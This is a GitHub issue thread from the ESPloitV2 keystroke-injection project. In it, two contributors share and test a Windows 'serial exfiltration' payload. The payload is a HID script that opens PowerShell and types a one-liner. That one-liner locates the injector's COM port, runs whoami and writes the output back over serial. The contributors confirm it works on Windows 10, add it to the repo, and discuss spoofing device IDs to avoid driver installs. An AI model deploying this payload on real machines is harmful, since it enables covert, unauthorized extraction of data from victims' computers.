exploitagency/ESPloitV2 #13: Windows Serial Exfiltration

whid-injector, 2017-10-30:
Since we have the Linux one, I thought we might want also the Windows one.
```
DefaultDelay:50
CustomDelay:3000
Press:131+114
CustomDelay:1000
PrintLine:powershell
CustomDelay:1000
PrintLine:$s=(Get-WmiObject -Class Win32_PnPEntity -Namespace "root\CIMV2" -Filter "PNPDeviceID like 'USB\\VID_1b4f&PID_9208%'").Caption; $com=[regex]::match($s,'\(([^\)]+)\)').Groups[1].Value; $cmd=whoami; $port= new-Object System.IO.Ports.SerialPort $com,38400,None,8,one; $port.open(); $port.WriteLine("SerialEXFIL:$cmd"); $port.Close(); exit;
```
Is just a PoC, we can of course improve it, by reducing the size of payload. But works.

exploitagency, 2017-10-30:
Nice one liner.  I will test it and include it.

I think this is misleading though, I believe Windows requires the specific ftdi driver for this to work.

Check a Windows machine that has never had Arduino IDE installed or such devices inserted.  I don't have time to test a true clean install in a VM but I have a Win10 VM and a Win7 VM that didn't recognize the WHID as a COM port, of course the generic HID keyboard worked.

Perhaps there is a vid.pid combo that Windows recognizes as a serial device without drivers and just works.  Of course legally you can't use that vid.pid combo but you can at least have the information.

whid-injector, 2017-10-30:
Correct, need to try on a clean Win machine.
That's why I didn't push to the repo yet.
I put it here as reminder. ;]

exploitagency, 2017-10-30:
I would try spoofing the vid.pid of some generic serial device whose drivers ship with windows and see if it can work without installing drivers.

I will test and include it in my repo if you want.  Haven't had time yet.

whid-injector, 2017-10-30:
Do you already have in mind some of those VID/PID of generic devices?
By memory I cannot recall any.
I'll try tomorrow to check how it reacts with a clean laptop (time permitting).

whid-injector, 2017-10-30:
Sadly, at least from a Win7 VM... no FTDI drivers... no shit...
[image]

exploitagency, 2017-10-30:
I am an avid Linux user so I would have to research it.  Simulate installing drivers, go to that let me choose driver list and browse through what is there and then lookup what uses those drivers.

whid-injector, 2017-10-31:
Just tried on a WIN10 machine (without any FTDI nor Arduino drivers) and it works like charm!
Most likely in newer versions of Windows, there are generic drivers for serial devices.

Need to try a Win8.1 though.

exploitagency, 2017-10-31:
I went ahead and added the payload.

It worked on my Win10Enterprise VM.

That VM was real slow though so I had to adjust the timing, mainly opening powershell.

Also the driver automatically installed, but I don't remember the history of that VM I'd need to test on a clean VM but it is verified to be functional.  A delay at the beginning of the payload to give time for drivers to load is no big deal too.

closed 2017-10-31 by exploitagency

whid-injector, 2017-11-02:
Fun fact. Win 8.1 reacts differently.
It cannot see it as COM... sadly...

[image]
But still working on win10 though!